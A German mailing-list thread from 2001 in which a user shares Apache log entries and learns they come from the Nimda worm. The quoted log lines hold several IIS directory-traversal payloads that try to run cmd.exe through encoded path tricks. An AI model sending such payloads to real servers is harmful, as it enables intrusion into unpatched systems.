Am Donnerstag, 27. September 2001 23:43 schrieb Tobias Geis:
Hi, ich habe folgendes mehrmals in der /var/log/httpd/access_log
--- 217.59.45.34 - - [27/Sep/2001:23:26:55 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 281
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:57 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 286 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 217.59.45.34 - - [27/Sep/2001:23:26:58 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 ---
Versucht da jemand auf mein System drauf zu kommen ? Der muß wohl denken, ich habe einen IIS !!
wenn ich obige QuellIP mit Telnet und Port 80 bzw. 21 verwende, sehe ich das die Gegenstelle einen MS-Server laufen hat.
Wie kann ich dem Typen über die IP eine Nachricht zukommen lassen ?
Ciao Tobi
Hallo Tobi Das ist Nimda. Ist schon mehrmals über die Liste gegangen, was die Einträge im Logfile bedeuten. Für Apache-Anwender ist allerdings nur der Traffic ärgerlich, und der ist nicht unerheblich, wie Du siehst. CU Thorsten -- 'I believe in getting into hot water; it keeps you clean." -- G. K. Chesterton